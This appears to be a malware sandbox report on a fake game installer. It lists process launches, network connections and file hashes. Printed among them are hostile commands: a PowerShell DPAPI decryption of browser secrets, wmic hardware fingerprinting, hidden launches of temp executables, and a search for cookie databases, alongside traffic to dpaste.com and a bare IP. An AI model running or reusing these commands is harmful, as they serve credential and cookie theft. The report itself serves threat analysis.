powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,65,118,227,64,90,91,24,70,140,186,76,54,175,210,229,59,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,124,33,230,177,155,163,191,120,106,96,217,164,186,156,233,189,33,12,59,85,74,89,216,159,145,5,183,37,212,105,228,249,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,163,123,12,209,104,80,51,164,79,110,37,21,19,218,70,144,23,149,218,57,253,47,12,108,201,246,154,230,51,204,189,51,48,0,0,0,220,38,18,178,228,79,29,150,249,18,143,151,58,62,4,228,125,226,68,37,72,14,184,1,91,188,237,128,85,122,239,247,58,28,173,154,165,223,4,255,29,128,22,190,180,43,98,165,64,0,0,0,104,116,170,164,7,33,137,82,205,20,102,203,146,189,88,92,9,184,170,237,14,63,35,12,59,150,140,83,173,104,112,148,180,123,114,163,225,162,203,243,171,234,152,101,129,222,102,232,148,83,63,117,187,52,72,102,239,137,119,236,89,154,25,234), $null, 'CurrentUser')

C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\IslandHoppersInstallerv1.3.0" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1864 --field-trial-handle=1868,i,6472773492669102633,4315078123375886406,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name"

C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe

"C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\IslandHoppersInstallerv1.3.0.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\IslandHoppersInstallerv1.3.0" --mojo-platform-channel-handle=2096 --field-trial-handle=1868,i,6472773492669102633,4315078123375886406,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get ProcessorId"

C:\Windows\System32\Wbem\WMIC.exe

wmic cpu get ProcessorId

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get Product"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get Product

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get SerialNumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic baseboard get SerialNumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic OS get caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic computersystem get TotalPhysicalMemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get TotalPhysicalMemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_videocontroller get caption,PNPDeviceID"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_videocontroller get caption,PNPDeviceID

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get SerialNumber"

C:\Windows\System32\Wbem\WMIC.exe

wmic diskdrive get SerialNumber

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_computersystemproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\zglt0c.exe' -ArgumentList 'IVqoat7CfV' -WindowStyle Hidden}""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\zglt0c.exe' -ArgumentList 'IVqoat7CfV' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\zglt0c.exe

"C:\Users\Admin\AppData\Local\Temp\zglt0c.exe" IVqoat7CfV

C:\Windows\system32\NOTEPAD.EXE

"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Programs\IslandHoppersInstallerv1.3.0\LICENSE.electron.txt

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\5nwlzd.exe' -ArgumentList 'IVqoat7CfV' -WindowStyle Hidden}""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -WindowStyle Hidden -Command "& {Start-Process -FilePath 'C:\Users\Admin\AppData\Local\Temp\5nwlzd.exe' -ArgumentList 'IVqoat7CfV' -WindowStyle Hidden}"

C:\Users\Admin\AppData\Local\Temp\5nwlzd.exe

"C:\Users\Admin\AppData\Local\Temp\5nwlzd.exe" IVqoat7CfV

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "where /r . cookies.sqlite"

C:\Windows\system32\where.exe

where /r . cookies.sqlite

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\OpenWith.exe

C:\Windows\system32\OpenWith.exe -Embedding

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.mediafire.com udp
US 104.16.114.74:443 www.mediafire.com tcp
US 172.67.199.186:443 privacy.gatekeeperconsent.com tcp
US 8.8.8.8:53 translate.google.com udp
US 8.8.8.8:53 www.ezojs.com udp
US 8.8.8.8:53 cdn.amplitude.com udp
US 104.22.74.216:443 btloader.com tcp
US 172.67.170.144:443 www.ezojs.com tcp
US 104.16.79.73:443 static.cloudflareinsights.com tcp
US 104.21.42.32:443 privacy.gatekeeperconsent.com tcp
GB 142.250.187.238:443 fundingchoicesmessages.google.com tcp
DE 18.245.86.101:443 cdn.amplitude.com tcp
US 8.8.8.8:53 216.74.22.104.in-addr.arpa udp
US 8.8.8.8:53 144.170.67.172.in-addr.arpa udp
US 8.8.8.8:53 73.79.16.104.in-addr.arpa udp
US 8.8.8.8:53 238.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 32.42.21.104.in-addr.arpa udp
US 8.8.8.8:53 101.86.245.18.in-addr.arpa udp
US 104.16.52.110:443 otnolatrnup.com tcp
US 104.26.3.173:443 www.mediafiredls.com tcp
FR 35.181.89.222:443 g.ezoic.net tcp
US 172.67.69.19:443 ad-delivery.net tcp
US 172.67.69.19:443 ad-delivery.net tcp
US 130.211.23.194:443 api.btloader.com tcp
US 104.21.87.79:443 go.ezodn.com tcp
US 104.21.87.79:443 go.ezodn.com tcp
US 104.21.87.79:443 go.ezodn.com tcp
GB 142.250.200.10:443 translate.googleapis.com tcp
US 104.21.87.79:443 go.ezodn.com tcp
US 104.21.87.79:443 go.ezodn.com tcp
US 104.21.87.79:443 go.ezodn.com tcp
US 35.82.202.33:443 api.amplitude.com tcp
NL 23.63.101.152:80 apps.identrust.com tcp
US 172.67.142.121:443 go.ezodn.com tcp
GB 142.250.200.34:443 securepubads.g.doubleclick.net tcp
US 130.211.23.194:443 api.btloader.com udp
BE 74.125.71.154:443 stats.g.doubleclick.net tcp
GB 172.217.16.226:443 googleads.g.doubleclick.net tcp
US 8.8.8.8:53 152.101.63.23.in-addr.arpa udp
US 8.8.8.8:53 10.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 121.142.67.172.in-addr.arpa udp
US 8.8.8.8:53 34.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 2.200.250.142.in-addr.arpa udp
US 8.8.8.8:53 33.202.82.35.in-addr.arpa udp
BE 74.125.71.154:443 stats.g.doubleclick.net tcp
GB 142.250.200.34:443 securepubads.g.doubleclick.net udp
US 216.239.34.36:443 region1.analytics.google.com tcp
GB 142.250.200.3:443 www.google.co.uk tcp
GB 142.250.200.3:443 www.google.co.uk tcp
IE 52.212.11.218:443 ad.crwdcntrl.net tcp
IE 52.17.40.72:443 bcp.crwdcntrl.net tcp
US 188.114.96.2:443 bshr.ezodn.com tcp
DE 65.9.66.68:443 tags.crwdcntrl.net tcp
GB 142.250.187.196:443 www.google.com tcp
GB 142.250.187.238:443 fundingchoicesmessages.google.com udp
FR 35.181.89.222:443 g.ezoic.net tcp
US 8.8.8.8:53 cdn.jsdelivr.net udp
US 8.8.8.8:53 cdn.prod.uidapi.com udp
US 8.8.8.8:53 oa.openxcdn.net udp
US 8.8.8.8:53 static.criteo.net udp
US 8.8.8.8:53 invstatic101.creativecdn.com udp
US 8.8.8.8:53 cdn-ima.33across.com udp
US 104.18.36.155:443 htlb.casalemedia.com tcp
US 104.26.8.169:443 script.4dex.io tcp
NL 147.75.84.158:443 prebid.a-mo.net tcp
DE 51.89.9.253:443 onetag-sys.com tcp
US 178.128.132.116:443 prebid.cootlogix.com tcp
US 178.128.132.116:443 prebid.cootlogix.com tcp
US 178.128.132.116:443 prebid.cootlogix.com tcp
US 178.128.132.116:443 prebid.cootlogix.com tcp
US 178.128.132.116:443 prebid.cootlogix.com tcp
DE 52.222.236.48:443 hb.yellowblue.io tcp
US 104.22.52.86:443 cdn.id5-sync.com tcp
US 34.102.146.192:443 oa.openxcdn.net tcp
US 104.22.31.209:443 prebid.smilewanted.com tcp
US 104.22.31.209:443 prebid.smilewanted.com tcp
US 104.22.31.209:443 prebid.smilewanted.com tcp
US 104.22.31.209:443 prebid.smilewanted.com tcp
US 104.22.31.209:443 prebid.smilewanted.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
US 18.173.210.195:443 cdn.prod.uidapi.com tcp
US 151.101.1.229:443 cdn.jsdelivr.net tcp
US 172.64.152.89:443 cdn-ima.33across.com tcp
US 34.96.70.87:443 invstatic101.creativecdn.com tcp
DE 142.132.249.188:443 ghb.adtelligent.com tcp
NL 178.250.1.3:443 static.criteo.net tcp
GB 172.217.16.225:443 tpc.googlesyndication.com tcp
US 104.26.8.169:443 script.4dex.io tcp
US 178.128.132.116:443 prebid.cootlogix.com tcp
US 34.120.107.143:443 oajs.openx.net tcp
US 104.18.22.145:443 cadmus.script.ac tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
GB 142.250.187.196:443 www.google.com udp
DE 162.19.138.118:443 id5-sync.com tcp
N/A 224.0.0.251:5353 udp
US 34.120.107.143:443 oajs.openx.net udp
GB 172.217.16.226:443 googleads.g.doubleclick.net udp
GB 142.250.200.35:443 p4-encavk4def7yw-hjxbb7ehyx66um64-if-v6exp3-v4.metric.gstatic.com tcp
US 8.8.8.8:53 253.9.89.51.in-addr.arpa udp
US 8.8.8.8:53 48.236.222.52.in-addr.arpa udp
US 8.8.8.8:53 3.1.250.178.in-addr.arpa udp
US 8.8.8.8:53 195.210.173.18.in-addr.arpa udp
US 8.8.8.8:53 188.249.132.142.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 226.20.18.104.in-addr.arpa udp
US 8.8.8.8:53 143.107.120.34.in-addr.arpa udp
US 8.8.8.8:53 145.22.18.104.in-addr.arpa udp
US 8.8.8.8:53 118.138.19.162.in-addr.arpa udp
GB 142.250.187.196:443 www.google.com udp
US 34.98.64.218:443 u.openx.net tcp
GB 142.250.200.35:443 p4-encavk4def7yw-hjxbb7ehyx66um64-if-v6exp3-v4.metric.gstatic.com udp
DE 51.89.9.253:443 onetag-sys.com udp
US 107.151.11.18:443 ghb2.adtelligent.com tcp
GB 172.217.169.65:443 b48c6163849d866279f8b9113177e766.safeframe.googlesyndication.com tcp
US 104.21.87.79:443 go.ezodn.com tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
GB 142.250.187.193:443 cdn.ampproject.org tcp
US 216.239.34.36:443 region1.analytics.google.com udp
US 199.91.155.39:443 download2298.mediafire.com tcp
US 199.91.155.39:443 download2298.mediafire.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
GB 142.250.200.34:443 securepubads.g.doubleclick.net udp
US 104.16.52.110:80 otnolatrnup.com tcp
US 104.16.52.110:80 otnolatrnup.com tcp
US 3.161.82.68:443 woreppercomming.com tcp
US 172.67.174.4:443 www.ovardu.com tcp
DE 3.66.144.173:443 www.opera.com tcp
BE 104.68.66.120:443 cdn-production-opera-website.operacdn.com tcp
BE 104.68.66.120:443 cdn-production-opera-website.operacdn.com tcp
BE 104.68.66.120:443 cdn-production-opera-website.operacdn.com tcp
BE 104.68.66.120:443 cdn-production-opera-website.operacdn.com tcp
BE 104.68.66.120:443 cdn-production-opera-website.operacdn.com tcp
BE 104.68.66.120:443 cdn-production-opera-website.operacdn.com tcp
GB 172.217.16.238:443 www.googleoptimize.com tcp
NL 79.127.227.46:443 id.a-mx.com tcp
SE 23.34.232.193:443 ads.pubmatic.com tcp
SE 23.34.232.193:443 ads.pubmatic.com tcp
US 172.64.149.180:443 cdn.indexww.com tcp
US 172.64.149.180:443 cdn.indexww.com tcp
US 104.22.4.69:443 id.hadron.ad.gt tcp
NL 178.250.1.11:443 gum.criteo.com tcp
SE 23.34.232.19:443 hbx.media.net tcp
DE 3.71.149.231:443 ups.analytics.yahoo.com tcp
US 52.223.40.198:443 match.adsrvr.org tcp
US 192.241.154.32:443 sync.cootlogix.com tcp
SE 23.34.232.193:443 ads.pubmatic.com tcp
NL 178.250.1.11:443 gum.criteo.com tcp
SE 23.34.232.19:443 hbx.media.net tcp
DE 3.71.149.231:443 ups.analytics.yahoo.com tcp
US 192.241.154.32:443 sync.cootlogix.com tcp
US 104.22.4.69:443 id.hadron.ad.gt tcp
US 52.223.40.198:443 match.adsrvr.org tcp
US 104.22.31.209:443 static.smilewanted.com tcp
IE 34.253.110.95:443 id.crwdcntrl.net tcp
DE 141.95.98.65:443 lb.eu-1-id5-sync.com tcp
US 104.19.159.19:443 assets.a-mo.net tcp
NL 178.250.1.11:443 gum.criteo.com tcp
GB 142.250.200.10:443 translate-pa.googleapis.com udp
GB 185.83.71.234:443 sync.adtelligent.com tcp
US 8.8.8.8:53 19.159.19.104.in-addr.arpa udp
US 8.8.8.8:53 65.98.95.141.in-addr.arpa udp
FR 91.134.110.137:443 sync.smartadserver.com tcp
DE 37.252.171.53:443 secure.adnxs.com tcp
NL 69.173.156.149:443 pixel-eu.rubiconproject.com tcp
IE 52.18.168.73:443 ice.360yield.com tcp
IE 54.76.236.59:443 ap.lijit.com tcp
US 35.244.159.8:443 u.openx.net udp
DK 37.157.6.233:443 cm.adform.net tcp
US 8.2.110.33:443 us.shb-sync.com tcp
DE 13.32.27.67:443 s.ad.smaato.net tcp
US 74.121.140.211:443 sync.mathtag.com tcp
NL 69.173.156.148:443 pixel-eu.rubiconproject.com tcp
NL 82.145.213.8:443 t.adx.opera.com tcp
FR 154.54.250.80:443 ads.stickyadstv.com tcp
DE 3.122.62.224:443 rtb.mfadsrvr.com tcp
GB 185.64.191.214:443 image8.pubmatic.com tcp
NL 185.89.210.20:443 ib.adnxs.com tcp
US 80.77.87.161:443 cs.admanmedia.com tcp
FR 51.178.195.213:443 ssbsync-global.smartadserver.com tcp
US 172.67.40.173:443 spl.zeotap.com tcp
US 80.77.87.161:443 cs.admanmedia.com tcp
GB 142.250.187.226:443 cm.g.doubleclick.net tcp
US 8.8.8.8:53 20.210.89.185.in-addr.arpa udp
US 8.8.8.8:53 211.140.121.74.in-addr.arpa udp
US 8.8.8.8:53 173.40.67.172.in-addr.arpa udp
US 8.8.8.8:53 213.195.178.51.in-addr.arpa udp
US 8.8.8.8:53 161.87.77.80.in-addr.arpa udp
GB 142.250.187.226:443 cm.g.doubleclick.net udp
US 209.54.182.161:443 s.amazon-adsystem.com tcp
NL 35.214.149.91:443 x.bidswitch.net tcp
GB 172.217.16.242:443 p4-encavk4def7yw-hjxbb7ehyx66um64-538480-i2-v6exp3.v4.metric.gstatic.com tcp
GB 216.58.213.18:443 p4-encavk4def7yw-hjxbb7ehyx66um64-538480-i1-v6exp3.ds.metric.gstatic.com tcp
US 178.128.132.116:443 prebid.cootlogix.com tcp
GB 185.239.172.170:443 ghb2.adtelligent.com tcp
DE 142.132.249.188:443 ghb2.adtelligent.com tcp
GB 142.250.200.34:443 securepubads.g.doubleclick.net udp
US 107.151.11.18:443 ghb2.adtelligent.com tcp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
GB 142.250.187.196:443 www.google.com udp
GB 142.250.200.34:443 securepubads.g.doubleclick.net udp
GB 172.217.16.225:443 tpc.googlesyndication.com udp
US 216.239.34.36:443 region1.analytics.google.com udp
GB 163.70.151.35:443 www.facebook.com tcp
GB 172.217.16.227:443 p4-encavk4def7yw-hjxbb7ehyx66um64-538480-s1-v6exp3-v4.metric.gstatic.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com tcp
US 35.190.80.1:443 a.nel.cloudflare.com udp
DE 142.132.249.188:443 ghb2.adtelligent.com tcp
US 107.151.11.18:443 ghb2.adtelligent.com tcp
GB 185.239.172.170:443 ghb2.adtelligent.com tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 35.173.69.207:443 dpaste.com tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 35.173.69.207:443 dpaste.com tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:443 dns.google tcp
US 35.173.69.207:443 dpaste.com tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
US 8.8.8.8:53 dns.google udp
US 8.8.8.8:53 dns.google udp
US 8.8.4.4:443 dns.google tcp
US 35.173.69.207:443 dpaste.com tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp
FR 20.199.87.174:443 tcp

Files

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 5c4605aed5013f25a162a5054965829c
SHA1 4cec67cbc5ec1139df172dbc7a51fe38943360cf
SHA256 5c16c584cda1f348a7030e9cab6e9db9e8e47a283dd19879f8bb6d75e170827f
SHA512 bf2a5602fde0de143f9df334249fef2e36af7abeda389376a20d7613e9ccad59f2ca0447576ac1ed60ecf6ab1526c37e68c4614d79ae15c53e1774d325b4036f

\??\pipe\LOCAL\crashpad_1376_IJFUALMGKKYPMSXO

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

MD5 3066a8b5ee69aa68f709bdfbb468b242
SHA1 a591d71a96bf512bd2cfe17233f368e48790a401
SHA256 76f6f3fcef4b1d989542e7c742ff73810c24158ac4e086cbd54f13b430cc4434
SHA512 ad4d30c7be9466a797943230cb9f2ca98f76bf0f907728a0fa5526de1ed23cd5cf81b130ee402f7b3bb5de1e303b049d2867d98cf2039b5d8cb177d7a410b257

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 e3196989eaf0e9749777b56759dcef4e
SHA1 1ee805cddf063255661b42efe9f2b29991b851df
SHA256 535e264a0a3455adb4b8a5b3219e0ea669c8d1e3c1afa13c64a3c13f2e3939b1
SHA512 a0a798eadcc0a3bb9948036a06970573d40ba0d438be38c2d7b08ebfd41084841ebf4c2731e1714b497e77cfaf55862aea82135f88a42ffb5a64a2b0d25b1fa6

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

MD5 206702161f94c5cd39fadd03f4014d98
SHA1 bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA256 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA512 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000019

MD5 60140bc834da90837a9a4d1530484677
SHA1 d99868b0693b332681b4db7927f3f11b3ed37607
SHA256 29c0ba2fb11f5bbedff938e0d0a97da59f725cd153bc0c04f052419e779f134e
SHA512 448ddc49ab5128dfc0dc91ebe388d447e748848cd2f7dc15fe1fd0380a5436cc9872c32606d9d161d3648b20bff5eda0e48e8fb77c9293f3c0924ae89589eb37

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 acfb4cd330df2e1815d00e21606358f6
SHA1 85f1cf46a68f7f56bc1379b40d7511a500568ef8
SHA256 0a45ed7e0181bc05504b5be723feb22375691535e847d675c72e3fa82b96f237
SHA512 6755757fd5ade79f21d7b7a06337507d1d8d362ffb078b2c0d7fe681ea26ac88833953f5d21b3be5cef0929a12dbb3b639f5052f4fc4114ac8d6a6b786917677

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 7d8d644ddc9dcfaccb41e3e23a7dce31
SHA1 37ecc6737457d62e6224b530b676932da35113c1
SHA256 d071d2820e7cab7838ca4768dc633805f83bf5dfa760813388a84bfb1cfc1057
SHA512 fb602be70de726ab2d620b85611122836f3f7c8173abdd017f5d69ab589e5e8f6689a63123f3880f2d464c2e7d32e874e83a5b802fc39da1621cb2d4e6be0561

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe57c786.TMP

MD5 b42a5554365de67c2fad031217c65d35
SHA1 a4fb6f85369d18a46ba55ad25a977527d3bf7d45
SHA256 d98a33a85a9f3e7aed8ea51ab4c2832943cc78e9733ff8ccb3c1bdaa591d9c58
SHA512 bf1ce77220e149ce0651d323605c9fa63ecfb808357ce087d221737a5f7aa03cf14a443e1138d8f894a5f1ca5d248c185c1e82e97e59863d87fd5d4d882a69ac

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 85c5fe57beb6dfa4eab0ec0aad196c8f
SHA1 4a8f20fd78dddbd2f7fa7f2f36a0f688532d6355
SHA256 594fc94d37982351d4d1203b49e9f56b465e95db25a831695845ea19b80979de
SHA512 35675532a14812af476b3a8bd7fc15aca94fca59bd10f289d0f7b2bd5ec9d3872690c2376780a184bd586303c7958804c98a265751049926cb71d6180cb0d0ff

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 792378b9190d9f09bc24ca433f40e2b5
SHA1 b563bd03a8a23389226db8d2c1b351f3d2356142
SHA256 4d33a9e9bee1e35c8948ade39e30c3a21cff5047ee09eb250c4c613c72bc1bd2
SHA512 5434370ed75c3cdc5c7ed6e8e770cd265319b6e349e0f1af689a8f48cc086b3507e9176509bd1d2e2f1740652688cf2dedd70e24fc770aebf5193a6d834178ca

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 c012666043b9ffc8ab459b091a97663b
SHA1 a8b390defa932b8dc623ff4e02dd2c56bc75a648
SHA256 e790f72b841643f16ace091612bf915698623fe84fa40c87d4d7a664a133c046
SHA512 8dfcb31550c035c45bba00bbdc0ffcafc94c3b8785202b3a245b6bb75d0b428593f5a7f022bebd1b11cb2096567cc4f5ea61ec9269414f5c84c3717e61c8cf36

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\temp-index

MD5 7cbccc78375eaac69c5911ac9806f398
SHA1 f2949f3a438ec32d9994c7627fdf1dd220c50929
SHA256 5738d42049b3efb32736fe5ef60edfb5e56502cdd08d2d7bad2045d83d456799
SHA512 14ad1f3ce506dff3bb017b40a53e494c7e397eac0d302f33cc0f3677658e6a39b9b669c7deb4955cbe52cefcde74fd962a83344aec52db819b6c63f6967e8489

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000018

MD5 42d9fcc7172456834d9e05605cfb999f
SHA1 d1df0982a953011482b7cc5e97803a5fae290ba7
SHA256 5029f1471e648ecdf5518199b5d7a6fdcf2dab7b9ba8367331b0836de3064575
SHA512 5fc471dfd6cf0516739b40db211b4f1e0d3e27e7b53eb1e0c8d34f7ddf5d09ff520bd4c3b7baca993857fd462f184621391fed363a548bc7b50eee3b7ef6ade8

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 bd542e9d9c8ed38f738b6ffa8e17c659
SHA1 42edaec55c2216f925b49c59e55afa8560752b98
SHA256 7366cdd8dc19fd6b1c2bab46bb6b3b02df2f5c58ee03dbe150317fe099bc5112
SHA512 9b4fddd28dcf72b86548fc7d385e08835b6a0094012a519091e559d78a8261f15d2547584c31321a36fa30302e59a9e25937f67bed3b0db1980c9788438be439

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

MD5 5db66ae092cdce083c60c4aaa621c718
SHA1 267239981608dbc48801b59576a441d173e22a89
SHA256 4fd43ed741045701e7cfa25f8e6c7388b57afdec27dbec01df2be874448fdfca
SHA512 ad31769ccdc5e042e62b854ef93bc7f5cdd16061aa9226d4fc98c35894cc8f310681f0d76044965cf81e471db0c0a19213d533fb92776a994bfb9a8306dc00dd

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

